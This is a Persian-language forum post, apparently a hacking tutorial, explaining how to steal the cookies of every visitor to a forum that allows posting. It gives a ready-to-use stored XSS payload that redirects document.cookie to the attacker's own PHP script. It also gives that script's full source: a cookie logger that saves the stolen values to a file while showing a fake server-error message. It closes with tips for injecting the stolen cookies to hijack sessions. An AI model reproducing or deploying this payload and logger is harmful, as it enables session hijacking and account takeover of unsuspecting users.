با سلام

حمله : cookies Steal
---------------------------------------------------------

وقتي شما وارد يك انجمن و يا يك محلي ميشويد كه قابليت پست دادن داريد ميتوانيد با تزريق كد جاوا اسكريپت و هدايت كوكي هاي تمام كساني كه به آنجا وارد ميشوند به سمت سروريديگر و ذخيره آنها براي خود ، كوكي هاي انها را برداشته و مورد استفاده قرار دهيد :

آن كد جاوايي كه بايد تزريق شود :

كد: <SCRIPT>location.href='http://www.yoursite.com/cookielogger.php?cookie='+escape(document.cookie)</SCRIPT>

خوب به جاي : http://www.yoursite.com/cookielogger.php بايد آدرس جايي را كه قبلا فايل cookielogger.php را در آنجا ريخته ايد (با قابليت اجراي فايل هاي php ) و اجازه write را بدهيد :

سورس cokielogger :

كد: <?php
$filename = "logfile.txt";
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, 'a'))
{
echo "Temporary Server Error,Sorry for the inconvenience.";
exit;
}
else
{
if (fwrite($handle, "\r\n" . $_GET["cookie"]) === FALSE)
{
echo "Temporary Server Error,Sorry for the inconvenience.";
exit;
}
}
echo "Temporary Server Error,Sorry for the inconvenience.";
fclose($handle);
exit;
}
echo "Temporary Server Error,Sorry for the inconvenience.";
exit;
?>

خوب اين از اين .
البته به جاي كد جاوا اسكريپت بالا كه به صورت لينك است ميتواند كد هاي ديگر نيز قرار داد .
براي تزريق كوكي ها نيز از Achiles و يا تابع setcookie در php استفاده كنيد .


موضوعات مشابه: